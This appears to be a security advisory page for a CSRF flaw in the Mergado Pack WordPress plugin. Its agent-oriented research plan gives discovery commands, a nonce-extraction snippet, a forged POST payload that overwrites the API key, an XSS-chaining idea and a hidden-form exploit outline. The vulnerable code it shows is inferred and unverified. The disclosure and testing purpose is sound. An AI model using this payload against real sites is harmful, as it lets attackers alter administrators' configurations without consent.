CVE-2025-62089

Mergado Pack <= 4.2.0 - Cross-Site Request Forgery

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Mergado Pack plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.2.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.2.0
PublishedDecember 31, 2025
Last updatedJanuary 5, 2026
Affected pluginmergado-marketing-pack
Research Plan
Unverified

This research plan outlines the steps to identify and exploit the CSRF vulnerability in the **Mergado Pack** plugin (<= 4.2.0). Since the source code is not provided, this plan includes a discovery phase to locate the specific vulnerable function and parameters. --- ### 1. Vulnerability Summary Th…

Show full research plan

This research plan outlines the steps to identify and exploit the CSRF vulnerability in the Mergado Pack plugin (<= 4.2.0). Since the source code is not provided, this plan includes a discovery phase to locate the specific vulnerable function and parameters.


1. Vulnerability Summary

The Mergado Pack plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF). The vulnerability exists because certain administrative functions (likely settings management or feed configuration) do not perform nonce validation using check_admin_referer() or wp_verify_nonce(). An attacker can trick an authenticated administrator into performing unintended actions, such as modifying plugin settings or injecting malicious configurations, by enticing them to click a specially crafted link or visit a malicious website.

2. Attack Vector Analysis

  • Target Endpoint: Likely /wp-admin/admin.php (via the settings page) or /wp-admin/admin-post.php.
  • Vulnerable Action: A state-changing operation (e.g., saving settings) triggered via a POST request.
  • Required Authentication: The victim must be a logged-in administrator with the manage_options capability.
  • Preconditions: The attacker must know the exact POST parameters required by the vulnerable handler.

3. Discovery & Code Flow

The agent must first identify the vulnerable sink.

Discovery Steps:

  1. Search for state-changing hooks:
    grep -rn "add_action" . | grep -E "admin_init|admin_post_"
    
  2. Locate update_option calls triggered by user input:
    grep -rn "update_option" . --include="*.php" -B 10 | grep "POST"
    
  3. Audit for missing nonces (Inferred Path):
    The vulnerability is likely in a handler within includes/ or admin/ (e.g., class-mergado-pack-admin.php). Look for a function that processes $_POST data but lacks check_admin_referer.

Expected Vulnerable Pattern (Inferred):

// In a class like MergadoPack\Admin\Settings
public function save_settings() {
    if ( isset( $_POST['mergado_pack_save_settings'] ) ) {
        // VULNERABILITY: No check_admin_referer() here
        $settings = $_POST['mergado_settings'];
        update_option( 'mergado_pack_settings', $settings );
    }
}

4. Nonce Acquisition Strategy

Based on the vulnerability description ("missing or incorrect nonce validation"), there are two scenarios:

  1. Missing Nonce: No nonce is required. The Exploitation Strategy below assumes this.
  2. Incorrect Nonce (Bypass): If wp_verify_nonce is used with a static or easily obtainable action string (e.g., -1), the agent should extract it using browser_eval.

Extraction if a nonce is present but weak:

  1. Navigate to the settings page: browser_navigate("/wp-admin/admin.php?page=mergado-pack-settings").
  2. Extract the nonce: browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value").

5. Exploitation Strategy

This plan targets the settings update functionality to change the Mergado API key or a feed URL.

Step 1: Identify the POST Parameters
Identify the form structure on the Mergado settings page.

  • Action URL: /wp-admin/admin.php?page=mergado-pack-settings (or similar).
  • Parameters (Inferred): mergado_pack_save_settings=1, mergado_settings[api_key]=MALICIOUS_KEY.

Step 2: Construct the CSRF Payload
Using the http_request tool, simulate the cross-site request as the Admin victim.

// Payload for http_request
{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin.php?page=mergado-pack-settings",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "mergado_pack_save_settings=1&mergado_settings%5Bapi_key%5D=pwned_api_key&mergado_settings%5Benabled%5D=1"
}

6. Test Data Setup

  1. Install/Activate: Ensure Mergado Pack <= 4.2.0 is active.
  2. Admin User: Ensure an admin user exists (default in test environments).
  3. Initial State: Set a legitimate API key via WP-CLI to provide a baseline.
    wp option update mergado_pack_settings '{"api_key": "original_key", "enabled": "1"}' --format=json
    

7. Expected Results

  • HTTP Response: A 302 Found (redirect) back to the settings page or a 200 OK indicating success.
  • Data Change: The WordPress option mergado_pack_settings (or the relevant option name identified during discovery) should now contain the attacker-supplied value.

8. Verification Steps

After the http_request exploit, verify the impact using WP-CLI:

# Check if the option was updated
wp option get mergado_pack_settings --format=json

If the output contains "api_key": "pwned_api_key", the CSRF was successful.

9. Alternative Approaches

  • Admin-Post Exploitation: If the handler is registered via admin_post_mergado_save, the target URL changes to /wp-admin/admin-post.php and the body must include action=mergado_save.
  • XSS-CSRF Chain: If the plugin also has a Stored XSS vulnerability (common in settings pages), the CSRF can be used to inject an XSS payload into the settings, which would then execute when the admin views the page, potentially leading to full site takeover.
  • GET-based CSRF: Check if the handler uses $_REQUEST instead of $_POST. If so, the exploit can be simplified to a simple <img> tag or a link.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Mergado Pack plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to and including 4.2.0. This allows unauthenticated attackers to trick administrators into performing unauthorized actions, such as modifying plugin settings or API configurations, due to the absence of nonce validation on administrative handlers.

Vulnerable Code

// Inferred location: includes/class-mergado-pack-admin.php

public function save_settings() {
    if ( isset( $_POST['mergado_pack_save_settings'] ) ) {
        // VULNERABILITY: No check_admin_referer() or wp_verify_nonce() here
        $settings = $_POST['mergado_settings'];
        update_option( 'mergado_pack_settings', $settings );
    }
}

Security Fix

--- a/includes/class-mergado-pack-admin.php
+++ b/includes/class-mergado-pack-admin.php
@@ -2,6 +2,7 @@
 public function save_settings() {
     if ( isset( $_POST['mergado_pack_save_settings'] ) ) {
+        check_admin_referer('mergado_pack_settings_action', 'mergado_nonce');
         $settings = $_POST['mergado_settings'];
         update_option( 'mergado_pack_settings', $settings );
     }

Exploit Outline

1. Target Endpoint: The plugin's settings page, typically accessible via /wp-admin/admin.php?page=mergado-pack-settings. 2. Payload Construction: Create a hidden HTML form that targets the settings endpoint using the POST method. The form should include the necessary fields to trigger a configuration update, such as 'mergado_pack_save_settings=1' and malicious values within the 'mergado_settings' array (e.g., 'mergado_settings[api_key]=attacker_key'). 3. Authentication Requirement: The attacker requires a logged-in administrator to interact with the malicious payload. 4. Execution: The attacker entices the administrator to visit a malicious site or click a link. The browser automatically sends the POST request with the administrator's session cookies. Because the plugin does not verify a CSRF nonce, the settings update is processed and the attacker-controlled configuration is saved.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.